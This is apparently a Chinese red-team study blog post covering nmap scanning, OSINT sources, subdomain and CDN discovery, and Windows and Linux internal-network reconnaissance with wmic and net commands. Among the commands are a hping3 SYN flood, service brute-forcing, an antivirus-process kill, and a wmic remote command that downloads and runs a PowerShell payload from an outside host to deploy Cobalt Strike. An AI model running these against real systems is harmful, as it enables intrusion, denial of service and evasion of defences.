红队笔记-1(主机发现,情报收集,内网信息收集)
文章目录
- 一. 信息收集
- 主机发现
- NMAP
- 工作原理
- 扫描方式
- nmap 输出选项
- nmap高级扫描
- nmap脚本爆破服务
- 绕IDS&IPS
- nmap优缺点
- masscan
- nbtscan
- hping3
- fscan
- 关联信息收集
- 字典生成
- 常规字典
- 根据特征的字典生成
- 开源信息情报
- Github Hacking
- 搜索仓库-文件
- 自动化
- Google hacking
- Exploit-DB
- 开源情报
- 在线
- 搜索引擎
- whois 与 备案信息
- whois
- 备案
- 真实IP识别 与 指纹识别
- 判断 CDN 方法
- 通过 DNS解析记录判断 CDN
- SSL 证书查询 与 敏感目录
- 使用搜索引擎来收集计算机的CT日志
- 敏感目录
- 子域名爆破
- OneForAll
- hash碰撞
- 二级域名字典生成
- Favicon Hash 碰撞查找二级域名
- 找 favicon
- 生成hash
- ZoomEye
- fofa
- DNS域传送
- 测试方法
- 在线网站 搜索引擎 与 IP 反查
- 在线
- google语法
- IP反查
- Web指纹
- WAF探测
- 工具
- 手工
- 内网信息搜集
- Windows(工作组)
- 当前shell权限
- 系统信息
- 网络信息
- 主机名 与 操作系统
- 获取杀软
- 当前软件程序
- 账户
- 进程
- 当前登录域
- 远程桌面记录
- Windows(域)
- 账户
- 域
- Linux
- 基础信息
- WMIC命令
- wmic 基础命令
- 获取系统信息相关
- 进程相关
- 计算机相关
- wmi 相关大全
- 杀软相关
- 查询windows机器版本和服务位数和.net版本
- 查询本机所有盘符
- 卸载和重新安装程序
- 更改PATH环境变量值,新增c:\whoami
- 查看某个进程的详细信息-PID
- 终⽌⼀个进程
- 安装软件
- 使用Powershell操作wmi
- 横向
- 指定ip执行cmd命令
- 上cs
- Get-wmi对象
- 内网横向常见见端口
- Port:445
- Port:137、138、139
- Port:135
- Port:53
- Port:389
- Port:88
- Port:5985
一. 信息收集
主机发现
NMAP
工作原理
TCP是因特网中的传输层协议,使用三次握手协议建立连接。当主动方发出SYN连接请求后,等待对方回答TCP的三次握手TCP的三次握手SYN+ACK[1] ,并最终对对方的 SYN 执行 ACK 确认。这种建立连接的方法可以防止产生错误的连接,TCP使用的流量控制协议是可变大小的滑动窗口协议。TCP三次握手的过程如下:
- 【1】客户端发送SYN(SEQ=x)报文给服务器端,进入SYN_SEND状态。
- 【2】服务器端收到SYN报文,回应一个SYN (SEQ=y)ACK(ACK=x+1)报文,进入SYN_RECV状态。
- 【3】客户端收到服务器端的SYN报文,回应一个ACK(ACK=y+1)报文,进入Established状态。
nmap参数比较多,详情可以查阅官方手册
扫描方式
nmap 支持 通配符,如 192.168.0.* 192.168.0.0/24
-sT 基本的tcp扫描
-sU 基本udp扫描
-sS 半开放扫描
-sF,sX,sN FIN数据包扫描
-sU 基本udp扫描
-sV 基本服务扫描
-sA ACK扫描
-P0 扫描前,不ping主机(扫描变慢)
-PT 扫描前,进行ping
-sC 是指的是采用默认配置扫描,与--script=default参数等价-p 指定端口扫描
-A 综合扫描
-O 操作系统扫描
nmap 输出选项
Nmap的输出结果可以保存到外部文件中,保存的格式可以是:
交互式输出:这是默认输出,是标准输出,一般是输出到控制台
正常输出(-oN filename):与交互式输出类似,但是不包括运行信息和警告信息
XML输出(-oX filename):改格式可以转化成html、能够被nmap用户图形接口解析并支持导入数据库,推荐使用改格式。
Grep输出(-oG filename):该方式已经过时
由于html文件的可读性比xml更好,所以我们将xml格式转换成html格式。程序xsltproc可以完成这一转换。
xsltproc *.xml -o *.html
nmap高级扫描
nmap脚本扫描
脚本路径在nmap路径下的 scripts 下
linux在也在安装目录下 /usr/share/nmap/scripts/
常用脚本说明
命令 | 作用 |
---|---|
auth | 负责处理鉴权证书(绕开鉴权)的脚本 |
broadcast | 在局域网内探查更多服务开启状况,如dhcp/dns/sqlserver等服务 |
brute | 提供暴力破解方式,针对常见的应用如http/snmp等 |
default | 使用-sC或-A选项扫描时候默认的脚本,提供基本脚本扫描能力 |
discovery | 对网络进行更多的信息,如SMB枚举、SNMP查询等 |
dos | 用于进行拒绝服务攻击 |
exploit | 利用已知的漏洞入侵系统 |
external | 利用第三方的数据库或资源,例如进行whois解析 |
fuzzer | 模糊测试的脚本,发送异常的包到目标机,探测出潜在漏洞 intrusive: 入侵性的脚本,此类脚本可能引发对方的IDS/IPS的记录或屏蔽 |
malware | 探测目标机是否感染了病毒、开启了后门等信息 |
safe | 此类与intrusive相反,属于安全性脚本 |
version | 负责增强服务与版本扫描(Version Detection)功能的脚本 |
vuln | 负责检查目标机是否有常见的漏洞(Vulnerability),如是否有MS08_067 |
负责处理鉴权证书(绕开鉴权)的脚本,也可以作为检测部分应用弱口令
nmap脚本爆破服务
ftp
nmap -p 21 --script ftp-brute.nse --script-args userdb=C:\Users\wp_windows\Desktop\wp_home\user.txt,passdb=C:\Users\wp_windows\Desktop\wp_home\pass.txt 192.168.199.211
mysql
nmap -p 3306 --script mysql-brute.nse --script-args userdb=C:\Users\wp_windows\Desktop\wp_home\user.txt,passdb=C:\Users\wp_windows\Desktop\wp_home\pass.txt 192.168.199.211
snmp
nmap -sU -p 161 --script snmp-brute.nse --script-args snmp-brute.communitiesdb=C:\Users\wp_windows\Desktop\wp_home\user.txt 192.168.199.135nmap -sU -p 161 --script snmp-brute.nse --script-args userdb=C:\Users\wp_windows\Desktop\wp_home\user.txt 192.168.199.135
绕IDS&IPS
nmap -mtu 8 //发送8字节探针包
nmap -D ip1,ip2,ip3 地址伪装
nmap优缺点
- 优点:
Nmap作为主动式端口扫描工具,只要在对方没有把通信
阻断的情况下,可以在较短的时间内获得结果。 - 缺点:
(1)现在带有阻断功能的防火墙越来越多,有些防火墙当检测到端口扫描时,会将端口关闭一定的时间,还有的机器使用了很多filter功能,只对特定的IP地址提供服务,这种情况下,主动式的正确性大打折扣。
(2)主动式只是在一瞬间对端口进行扫描,只有当服务器那个时候使用的服务才有可能被侦测到。
(3)端口扫描是一种广义上的攻击行为,对于末经许可的机器,一般不能施行。
masscan
该工具兼容nmap参数,扫描速度相对nmap稍快一点
--adapter-ip 指定发包的ip地址
--adapter-port 指定发包源端口
--adapter-mac 指定发包的源MAC地址
nbtscan
nbtscan 多用于扫描内网的windows主机,通过netbios可得出主机名
hping3
hping3 主要用于测试防火墙与网络设备
hping3 的速度非常快
-0 --rawip IP原始报文
-1 --icmp ICMP模式
-2 --udp UDP模式
-8 --scan 扫描模式
-9 --listen 监听模式
-A --ack 设置ackflag
-S --syn 设置synflag
-F --fin 设置finflag
-R --rst 设置rstflag
-a --spoof 源地址欺骗,无法接受回包
使用hping3进行flood DoS攻击,阻塞网络。
hping3 -c 5000 -d 150 -S -w 64 -p 80 --flood 192.168.254.172-c:发送数据包的个数
-d:每个数据包的大小
-S:发送SYN数据包
-w:TCP window大小
-p:目标端口,你可以指定任意端口
--flood:尽可能快的发送数据包
--rand-source :使用随机的Source IP Addresses.
fscan
一键自动化、全方位漏洞扫描的开源工具
1.信息搜集:存活探测(icmp)端口扫描
2.爆破功能:各类服务爆破(ssh、smb等)数据库密码爆破(mysql、mssql、redis、psql等)
3.系统信息、漏洞扫描:获取目标网卡信息高危漏洞扫描(ms17010等)
4.Web探测功能:webtitle探测web指纹识别(常见cms、oa框架等)web漏洞扫描(weblogic、st2等,支持xray的poc)
关联信息收集
针对目标的特征,特性,爱好,各种信息进行分析,拆分,整合,为后面的字典,水抗,鱼叉做准备工作。
邮箱收集
通过说明文档以及网站页面收集,或者网站发表者以及留言板信息处收集账号
通过 teemo,metago,burpusit,awvs,netspker 或者 google 语法收集
搜索相关 QQ 群收集相关企业员工的社交账号
字典生成
常规字典
https://github.com/epony4c/Exploit-Dictionary
根据特征的字典生成
https://github.com/LandGrey/pydictor
比如我根据关联信息收集得到 一个公司的员工号前4位为 1903,这个公司工号共10位,我将使用工具生成一个10位均为1903开头的工号进行口令爆破。
python2 pydictor.py --sedb --head "1903" --len 10 10 --output ./1903x.txt
# 去重
python2 pydictor.py -tool uniqbiner sedb_162932.txt
输入你收集到的各种信息,通过微信,qq群,网站,等待手段尽可能多的收集
开源信息情报
Github Hacking
使用搜索页面检索仓库
搜索仓库-文件
cats stars:>1000 # 匹配关键字star大于1000的仓库
cats size:<10000 # 匹配关键字文件小于10k的仓库
cats topics:>=5 # 匹配关键字签到量大于等于5的仓库
cats forks:>400 # 匹配关键字克隆大于400的仓库
日期条件
cats pushed:<2021-07-05 # 匹配在2021-07-05前push代码
cats pushed:2020-07-05..2021-07-05 # 时间区间
cats created:>=2021-12-22 #创建时间
主体搜索
user:USERNAME #用户名
org:ORGNAME #组织
repo:USERNAME/REPOSITORY #指定仓库
文件名称
filename:config.php language:php #搜索文件config.php 语言位php
自动化
https://github.com/UnkL4b/GitMiner
Google hacking
https://ght.se7ensec.cn/#
intitle #标题
intext #内容
filetype #文件类型
info #基本信息
inurl #包含某个网站
Exploit-DB
搜索windows 提权漏洞
searchsploit -t windows local
搜索apache 漏洞
searchsploit -t apache
开源情报
在线
https://www.beenverified.com/
https://start.me/start/sg/sg
https://phonebook.cz/
https://x.threatbook.cn/
https://www.venuseye.com.cn/
https://ti.sangfor.com.cn/analysis-platform
https://ti.dbappsecurity.com.cn/
https://ti.360.cn/#/homepage
https://ti.nsfocus.com/
https://redqueen.tj-un.com/IntelHome.html
https://xz.aliyun.com/tab/18
https://www.threatminer.org/
https://nosec.org/home/index
http://121.36.26.171:8080/
搜索引擎
FOFA、钟馗之眼、Shoda、Censys
https://fofa.so/
https://www.zoomeye.org/
https://www.diaosiso.com/
whois 与 备案信息
whois
https://who.is/
https://whois.cloud.tencent.com/
https://whois.aliyun.com/
https://myip.ms/info/whois/42.247.8.131
备案
https://ipwhois.cnnic.net.cn/
https://www.creditchina.gov.cn/
http://www.beian.gov.cn/portal/registerSystemInfo
https://beian.miit.gov.cn/#/Integrated/index
http://www.gsxt.gov.cn/index.html
https://www.tianyancha.com/
真实IP识别 与 指纹识别
判断 CDN 方法
- 多地ping
- 通过其它信息判断
判读是否使用了CDN,最简单的方法就是多地ping,可在下面的网站中进行多地ping
http://ping.chinaz.com/
https://ping.aizhan.com/
https://www.ipip.net/
https://www.17ce.com/
https://ipinfo.io/
通过 DNS解析记录判断 CDN
寻找DNS历史记录,找到后修改host文件
https://site.ip138.com/
https://viewdns.info/propagation/?domain=
https://www.netcraft.com/apps/
https://www.cdnplanet.com/
https://dnsdb.io/zh-cn/
如果有注册等方法可以发邮件的,通过邮箱的原始信息
SSL 证书查询 与 敏感目录
使用搜索引擎来收集计算机的CT日志
https://crt.sh/
https://transparencyreport.google.com/https/certificateshttps://developers.facebook.com/tools/ct/
敏感目录
(1)Git(2)hg/Mercurial(3)svn/Subversion(4)bzr/Bazaar(5)Cvs(6)WEB-INF泄露(7)备份文件泄露、配置文件泄露
子域名爆破
OneForAll
https://github.com/shmilylty/OneForAll
python3 oneforall.py --target example.com run
python3 oneforall.py --targets ./example.txt run
hash碰撞
https://github.com/fofapro/Hosts_scan
二级域名字典生成
Favicon Hash 碰撞查找二级域名
找 favicon
生成hash
https://github.com/Viralmaniar/MurMurHash
ZoomEye
iconhash:-1588080585
fofa
icon_hash="-1588080585"
DNS域传送
DNS协议支持使用axfr类型的记录进行区域传送,用来解决主从同步的问题。如果管理员在配置DNS服务器的时候没有限制允许获取记录的来源,将会导致DNS域传送漏洞。
测试方法
# dig
dig @192.168.5.6 test.com axfr# nmap
nmap --script dns-zone-transfer.nse --script-args "dns-zone-transfer.domain=xxx.com" -Pn -p 53 your-ip# nslookup
ls 域名,如果没有列出域名和ip说明不存在此漏洞
在线网站 搜索引擎 与 IP 反查
在线
http://tools.bugscaner.com/subdomain/
https://searchdns.netcraft.com/
https://crt.sh/?q=xazlsec.com
https://cloud.tencent.com/product/tools?from=10680
https://phpinfo.me/domain
http://scan.javasec.cn/
google语法
site:qq.com
IP反查
在排除 CDN 的情况可以进行 ip反查域名
Web指纹
Web指纹信息包括,数据库,中间件,CMS等信息
https://www.yunsee.cn/
https://sitereport.netcraft.com/?
http://whatweb.bugscaner.com/look/
WAF探测
WAFW00F,Nmap,手工
工具
wafw00f -a 域名
nmap -p80,443 --script=http-waf-fingerprint ip
nmap -p80,443 --script=http-waf-detect ip
手工
手工提交恶意数据
返回图片对比
https://mp.weixin.qq.com/s/8F060FU9g_78z57UKS-JsQ
内网信息搜集
Windows(工作组)
当前shell权限
whoami /user
whoami /priv
系统信息
包括补丁,网卡,等信息
systeminfo
网络信息
netstat -ano -p tcp #tcp信息
netstat -ano -p udp #udp信息
ipconfig /all #详细网络信息
主机名 与 操作系统
当执行不了systeminfo时,可以使用wmic获取操作系统版本
hostname
wmic OS get Caption,CSDVersion,OSArchitecture,Version
获取杀软
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List
当前软件程序
wmic product get name,version
账户
quser #在线账户
net user #本地账户列表
net user username #查看某个账户信息
进程
tasklist /v #列出所有进程
taskkill pid #杀进程
当前登录域
net config workstation
远程桌面记录
cmdkey /l
Windows(域)
账户
net user /do #获取域用户列表
net user 域用户 /domain #获取域用户信息
net user /domain xxx 1234567 #修改域用户密码,需要域管权限
域
net group "domain admins" /domain #查看域管理员列表
net group "domain controllers" /domain #主域与辅域机器
net group "domain computers" /domain #查看域机器
net group /domain #域工作组net accounts /domain #查看域用户策略
Linux
基础信息
whoami #用户名
ifconfig #网卡信息
cat /proc/version #内核版本
netstat -tnlp #端口状态,服务
ps -ef #进程
cat /root/.bash_history #历史命令
WMIC命令
wmic和cmd在windows中都存在
wmic 基础命令
获取系统信息相关
#获取系统信息
wmic datafile where Name='c:\\windows\\explorer.exe' get Manufacturer,Version,Filename#获取固定分区盘
wmic logicaldisk where "drivetype=3" get name #获取smb共享
wmic share list brief#获取cpu信息
wmic cpu get name,caption,maxclockspeed,description
进程相关
#获取进程
wmic process list full
wmic process list brief#获取进程路径
wmic process get name,executablepath #删除指定进程
wmic process where name="qq.exe" call terminate
#or
wmic process where name="qq.exe" delete
#or pid
wmic process where pid="123" delete#创建新进程
wmic process call create "C:\Program Files\Tencent\QQ\QQ.exe"#远程创建
wmic /node:192.168.1.10 /user:administrator /password:123456 process call create cmd.exe
计算机相关
#关机
wmic process call create shutdown.exe#重启远程
wmic /node:192.168.1.10/user:administrator /password:123456 process call create "shutdown.exe -r -f -m"#更系统名
wmic computersystem where "caption='%ComputerName%'" call rename newcomputername#更用户名
wmic USERACCOUNT where "name='%UserName%'" call rename newUserName#更改现有工作组为指定的工作组
wmic computersystem Where "name='计算机名称' call UnjoinDomainOrWorkgroup#退出所在域
wmic computersystem Where "name='计算机名称'" call joindomainorworkgroup "",1,"域名称","域管理员密码","域管理员用户名"# 开2003 的3389
wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' callSetAllowTSConnections 1
wmi 相关大全
wmic logon list brief #登录⽤户
wmic ntdomain list brief #域控机器
wmic useraccount list brief #⽤户列表
wmic share get name,path #查看系统共享
wmic service list brief |more #服务列表
wmic startup list full #识别开机启动的程序,包括路径
wmic fsdir "c:\\test" call delete #删除C盘下的test目录
wmic nteventlog get path,filename,writeable #查看系统中开启的⽇志
wmic nicconfig get ipaddress,macaddress #查看系统中⽹卡的IP地址和MAC地址
wmic qfe get description,installedOn #使⽤wmic识别安装到系统中的补丁情况
wmic product get name,version #查看系统中安装的软件以及版本,2008R2上执行后无反应。
wmic useraccount where "name='%UserName%'" call rename newUserName #更改当前用户名
wmic useraccount where "name='Administrator'" call Rename admin #更改指定用户名
wmic bios list full | findstr /i "vmware" #查看当前系统是否是VMWARE,可以按照实际情况进行筛选
wmic desktop get screensaversecure,screensavertimeout #查看当前系统是否有屏保保护,延迟是多少
wmic process where name="vmtoolsd.exe" get executablepath #获取指定进程可执行文件的路径
wmic environment where "name='temp'" get UserName,VariableValue #获取temp环境变量
杀软相关
###查询当前主机的杀毒软件
wmic process where "name like '%forti%'" get name
wmic process where name="FortiTray.exe" call terminate
wmic /namespace:\\root\securitycenter2 path antivirusproduct GET displayName,productState,pathToSignedProductExe
wmic /namespace:\\root\securitycenter2 path antispywareproduct GET displayName,productState, pathToSignedProductExe & wmic /namespace:\\root\securitycenter2 path antivirusproduct GET displayName,productState, pathToSignedProductExe
wmic /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List
######查询当前主机的杀毒软件
wmic process where "name like '%forti%'" get name
wmic process where name="FortiTray.exe" call terminate
wmic /namespace:\\root\securitycenter2 path antivirusproduct GET displayName,productState,pathToSignedProductExe
wmic /namespace:\\root\securitycenter2 path antispywareproduct GET displayName,productState, pathToSignedProductExe & wmic /namespace:\\root\securitycenter2 path antivirusproduct GET displayName,productState, pathToSignedProductExe
wmic /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List
查询windows机器版本和服务位数和.net版本
wmic os get caption
wmic os get osarchitecture
wmic OS get Caption,CSDVersion,OSArchitecture,Version
wmic product where "Name like 'Microsoft .Net%'" get Name, Version
查询本机所有盘符
wmic logicaldisk list brief
wmic logicaldisk get description,name,size,freespace /value
卸载和重新安装程序
wmic product where "name like '%Office%'" get name
wmic product where name="Office" call uninstall
查看某个进程的详细信息 (路径,命令⾏参数等)
wmic process where name="chrome.exe" list full
wmic process where name="frp.exe" get executablepath,name,ProcessId 进程路径
wmic process where caption="frp.exe" get caption,commandline /value
更改PATH环境变量值,新增c:\whoami
wmic environment where "name='path' and username='<system>'" set VariableValue="%path%;c:\whoami
查看某个进程的详细信息-PID
wmic process list brief
tasklist /SVC | findstr frp.exe
wmic process where ProcessId=3604 get ParentProcessId,commandline,processid,executablepath,name,CreationClassName,CreationDate
终⽌⼀个进程
wmic process where name ="xshell.exe" call terminate
ntsd -c q -p 进程的PID
taskkill -im pid
wmic baseboard get Product,SerialNumber
wmic bios get serialnumber
安装软件
wmic product get name,version
wmic product list brief
使用Powershell操作wmi
Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_Share #共享
Get-WmiObject -Namespace ROOT\CIMV2 -Class CIM_DataFile #⽂件/⽬录列表
Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_Volume #磁盘卷列表
Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_Process #当前进程
Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_Service #列举服务
Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_NtLogEvent #⽇志
Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_LoggedOnUser #登陆账户
Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_QuickFixEngineering #补丁
Get-WmiObject -Namespace root\SecurityCenter2 -Class AntiVirusProduct #杀毒软件###操作系统相关信息
Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_OperatingSystem
Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_ComputerSystem
Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_BIOS
######注册表操作
Get-WmiObject -Namespace ROOT\DEFAULT -Class StdRegProv
Push-Location HKLM:SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Get-ItemProperty OptionalComponents
横向
指定ip执行cmd命令
需要管理员权限
wmic /node:10.10.0.10 /user:administrator /password:win@123 process call create "cmd.exe /c ipconfig >c:\ip.txt"
上cs
注意:请注意powershell对于特殊字符的转义,例如“,@,#,$等等。
wmic /NODE:192.168.8.180 /user:"administrator" /password:"win@123" PROCESS call create "powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://xx.xx.xx.xx:8881/a'))\""
Get-wmi对象
powershell的get-wmi对象,是获取 windows management instrumentation(WMI)类的实例或有关可用信息。
get-wmiobject -list #自己的windows计算机支持可用的wmi类
https://docs.microsoft.com/zh-cn/powershell/module/Microsoft.PowerShell.Management/Get-WmiObject?view=powershell-5.1
内网横向常见见端口
Port:445
smb(server message block)windows协议族,主要功能:文件打印共享服务
空会话
net use \\192.168.111.18
远程本地会话
a为工作组名
net use \\192.168.111.18 /user:a\username password
域远程认证
wpsec.com 为根域
net use \\192.168.111.18 /user:wpsec.com\username password
Port:137、138、139
NetBios端口,137,138为UDP端口,用于内网传输文件,NetBios/SMB服务的获取主要通过139端口
Port:135
DCOM和RPC(Remote Procedure Call)服务,可以做WMI管理工具远程操作
Port:53
DNS服务端口,可做隧道穿透,隐蔽性更好
- dns2tcp
- dnscat2
Port:389
LADP(轻量级目录访问协议),属于TCP/IP协议族,一般在域控上出现该端口,尝试使用爆破该端口进行权限认证
Port:88
Kerberos服务端口,属于TCP/IP协议族,监听KDC请求,利用该协议制作白银/黄金票据
Port:5985
WinRM服务,WinRM允许远程用户使用工具和脚本对windows服务器进行管理
条件:
在 windows vista 上未自启,在2008上自启动
需要开启端口,需要开启防火墙
winrm quickconfig
红队笔记-1(主机发现,情报收集,内网信息收集)相关推荐
- 内网渗透-内网信息收集
内网信息收集 文章目录 内网信息收集 前言 msf模块中的信息收集 msf反弹shell后的信息收集 内网信息收集 后记 前言 当我们进行外网信息收集,漏洞探测以及漏洞利用后,获得了主机的权限后,我们 ...
- 《内网安全攻防:渗透测试实战指南》读书笔记(二):内网信息收集
目录 前言 一.收集本机信息 1.手动搜集 (1)查询网络配置 (2)查询操作系统及软件的信息 (3)查询本机服务信息 (4)查询进程列表 (5)查看启动程序信息 (6)查看计划任务 (7)查看主机开 ...
- 信息收集之外网信息收集
从个人的角度去简单整理下打点前的信息收集那些事.从信息收集本质上来说多数内容都是大同小异,遇到坚壁时,不用死磕,毕竟条条大路通罗马.(大佬们也可以说说看法~向各位大佬学习!!) Tell Me 想要构 ...
- 内网信息收集(超级全)
内网信息收集 文章首发与奇安信攻防社区 https://forum.butian.net/share/236 简介 在渗透测试中信息收集的深度与广度以及对关键信息的提取,直接或间接的决定了渗透测试的质 ...
- 内网渗透测试:内网信息收集与上传下载
在之前的几节中,我们讲了隐藏通讯隧道技术的运用,那其实都是渗透测试的后话,接下来要讲的信息收集才是内网渗透的基础. 可以说内网渗透测试,其本质就是信息收集.信息收集的深度,直接关系到内网渗透测试的成败 ...
- windows内网信息收集
前言: 进入内网之后,是一种由点到线再到面的测试,先弄清楚当前机器的情况,如在域中角色,提供的服务等信息:再以此为跳板收集其它机器的信息,当收集的信息足够多,拿下域控的可能型也就越高. 本机信息收集 ...
- [内网安全]四.内网信息收集--BloodHound工具与PowerShell工具的使用
作为网络安全爱好者,对内网的渗透学习必不可少.因此从今天开始从零开始记录自己的内网学习过程,一方面是督促自己不断前行且学习新知识:另一方面是分享与读者,希望大家一起进步.这系列文章入门部分将参考徐焱老 ...
- 内网信息收集(Windows)--本机信息收集
文章目录 手动查询命令 本机网络配置信息 查询操作系统信息和软件信息 查询本机服务信息 查询进程信息 启动程序信息 查看计划任务 查询用户列表 net session 端口信息 补丁信息 本机共享列表 ...
- 内网信息收集——工作组/域信息收集
1. 查询网络配置 查询网络配置:ipconfig /all C:\Users\hehao>ipconfig /allWindows IP 配置主机名 . . . . . . . . . . . ...
最新文章
- MySQL中文全文索引
- java打开db文件_java 读取DB.properties文件方式 | 学步园
- hiho1257 Snake Carpet
- NYOJ 289 苹果(01背包)
- RNA_seq(1)植物转录组实战(下)之DESeq2进行差异基因分析
- 阿里云ECS搭建在线IDE
- 多元线性回归分析spss结果解读_SPSS案例实践笔记:多重线性回归分析
- 《C++ primer》学习笔记(第二章)——变量和基本类型
- 学习通否认 QQ 号被盗与其有关:已报案;iPhone 14 量产工作就绪:四款齐发;简洁优雅的软件早已是明日黄花|极客头条
- Admob ANE for Flash Air最新中文教程
- 事情永远做不完,却什么都带不走
- 安装应用提示安装失败或不能安装,报INSTALL_FAILED_DUPLICATE_PERMISSION错误
- cdc有哪些rapper_CDC说唱会馆在圈内是一个什么样的存在
- JavaScript 教程「1」:与君初相识
- oracle12c ora 12560,12C安装历险记----ORA-12560和ORA-12537的解决方案
- Java安装方法(详细)
- 旅行商问题(travelling salesman problem, TSP) 解题报告
- 泰课在线零基础高级篇最后案例的完成笔记
- 如何合并多个excel文件图文步骤
- Maven打包时排除指定的目录或指定的类
热门文章
- 2020-02-22
- 组策略应用—屏幕保护我做主
- 红外小目标检测之DANNet
- 思维导图软件MindManager 2020中文版
- TensorFlow学习--函数逼近(RBF神经网络)
- java之HeapByteBufferDirectByteBuffer以及回收DirectByteBuffer
- java如何解除文件锁定状态_如何使用Python解锁锁定的文件和文件夹(mac)
- Unix编程需要学习的内容(3)《精通Unix下C语言与项目实践》读书笔记(13)
- hashmap中的key是有序的么_关于HashMap中KEY的有序排列的反思和总结(对应TreeMap)
- Python 自动化领域起点篇,Selenium WebDriver 学习第1篇